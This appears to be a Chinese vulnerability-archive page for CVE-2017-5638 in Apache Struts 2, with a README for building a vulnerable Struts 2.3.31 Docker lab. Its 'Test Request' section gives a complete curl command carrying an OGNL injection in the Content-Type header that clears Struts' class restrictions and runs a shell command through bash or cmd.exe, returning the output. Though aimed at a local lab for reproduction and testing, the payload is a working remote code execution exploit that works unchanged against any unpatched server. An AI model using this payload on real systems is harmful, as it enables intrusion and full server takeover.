关联漏洞
标题:
Apache Struts 2 输入验证错误漏洞
(CVE-2017-5638)
描述:Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全漏洞,该漏洞源于程序没有正确处理文件上传。远程攻击者可借助带有#cmd=字符串的特制Content-Type HTTP头利用该漏洞执行任意命令。
描述
Build the struts-2.3.31 (CVE-2017-5638) environment
介绍
# vulnerability_struts-2.3.31
Build the struts-2.3.31 (CVE-2017-5638) environment.
https request is possible.
## environment
Ubuntu 20.04
Docker 20.10.12
curl 7.68.0
## Server Startup
We will use the tomcat:7.0-jre8 docker image.
Unzip struts-2.3.31.zip in a directory of your choice.
cd struts-2.3.31
sudo docker build -t struts/2_3_31 .
sudo docker run -it --rm -p 8443:8443 struts/2_3_31
## Test Request
one(expect 200OK)
curl --location --request GET 'https://127.0.0.1:8443/struts2-showcase/showcase.action' -k -I
another(expect 200OK)
curl --location --request GET 'https://127.0.0.1:8443/struts2-showcase/showcase.action' --header 'Content-Type: %{(#_='\''multipart/form-data'\'').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['\''com.opensymphony.xwork2.ActionContext.container'\'']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='\''ls'\'').(#iswin=(@java.lang.System@getProperty('\''os.name'\'').toLowerCase().contains('\''win'\''))).(#cmds=(#iswin?{'\''cmd.exe'\'','\''/c'\'',#cmd}:{'\''/bin/bash'\'','\''-c'\'',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' -k
## Detail
struts2-showcase.war is downloaded below
https://archive.apache.org/dist/struts/2.3.31/
server.xml is tomcat setting file.
It edited for ssl enable.
文件快照
[4.0K] /data/pocs/dc7904e45bd96763ccda65b2ca8bdb6c17a41fd2
├── [ 295] Dockerfile
├── [ 11K] LICENSE
├── [1.6K] README.md
├── [6.4K] server.xml
└── [ 13M] struts2-showcase.war
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。